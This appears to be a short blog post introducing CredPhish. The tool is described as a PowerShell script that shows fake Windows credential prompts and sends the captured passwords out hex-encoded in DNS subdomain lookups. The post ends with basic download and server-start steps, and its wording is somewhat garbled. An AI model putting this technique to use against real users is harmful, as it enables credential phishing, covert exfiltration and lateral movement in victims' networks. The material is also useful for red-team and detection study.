Exfiltrate Password – Prompting for credentials is an effective way to elevate permissions and move laterally. It is not uncommon for password prompts for Outlook, VPN, and various other authentication protocols to appear randomly in a Windows environment. The attacker will use built-in Windows and PowerShell functions to pop up a credential pop-up window to retrieve the user’s password.
What is Credphish?
CredPhish is a PowerShell script for obtaining credentials and filtering passwords. It uses CredentialPicker API to collect user passwords, PowerShell ResolveDnsName for DNS penetration, and Windows Defender ConfigSecurityPolicy.exe to perform any GET requests.
By default, CredPhish uses ResolveDnsName (PowerShell’s built-in DNS resolver) to filter credentials. It converts each character in the voucher to its corresponding hexadecimal value, breaks the converted value into predefined blocks, and places them in the subdomains of popular websites. The following screenshot shows an example of the credentials extracted in hexadecimal form. Look at the hexadecimal value “Tokyo Neon” (746f6b796f6e656f6e) in the subdomains of google.com and office.com.
Before resolving the DNS query, the DNS server deletes the hexadecimal subdomain to avoid generating dozens of error messages. Please note that the “Reply” field no longer contains a subdomain and correctly resolves to one of the Google IPs in the Wireshark screenshot below.
How To Download Credphish Exfiltrate Passwords Tool
Step 1:
First, we need to download the Github Creadphish Exfiltrate Passwords tool so type the below command
https://github.com/tokyoneon/CredPhish.git 
Step 2:
Now change the directory to credphish
cd CredPhish 
Step 3:
Run the python file to exfiltrate passwords over dns
sudo ./dns_server.py
Post a Comment